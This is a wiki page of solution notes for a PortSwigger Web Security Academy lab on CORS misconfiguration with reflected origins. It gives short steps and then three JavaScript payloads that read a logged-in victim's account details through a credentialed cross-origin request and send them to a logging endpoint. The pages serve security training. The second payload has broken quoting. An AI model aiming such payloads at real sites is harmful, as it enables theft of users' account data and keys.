Cross origin resource sharing (CORS) - gachikuku/portswigger GitHub Wiki

Apprentice lab:
CORS vulnerability with basic origin reflection

  • Solution

    1. login in as wiener peter and look at the responses headers

    2. Access-Control-Allow-Credentials header may indicate CORS support. Use Origin header and set it to a random website.

    3. Access-Control-Allow-Origin is reflected in the response.

    4. HTML payloads:

      1. Portswigger's payload

        <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

      2. Popo hack's payload

        <script>
    const request = new XMLHttpRequest()

    request.open("get", "https://uuid.web-security-academy.net/accountDetails, true)

    request.onload = ()=>{
        window.location.href = '/popo?key=" + request.responseText
    }

    request.withCredentials = true
    request.send()
</script>

      3. Rana Khalil's payload

        <script>
    var xhr = new XMLHttpRequest();
    var url = "https://uuid.web-security-academy.net"

    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE){
            fetch("/log?key=" + xhr.responseText)
        }
    }

    xhr.open('GET', url + "/accountDetails", true);
    xhr.withCredentials = true;
    xhr.send(null)
</script>

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️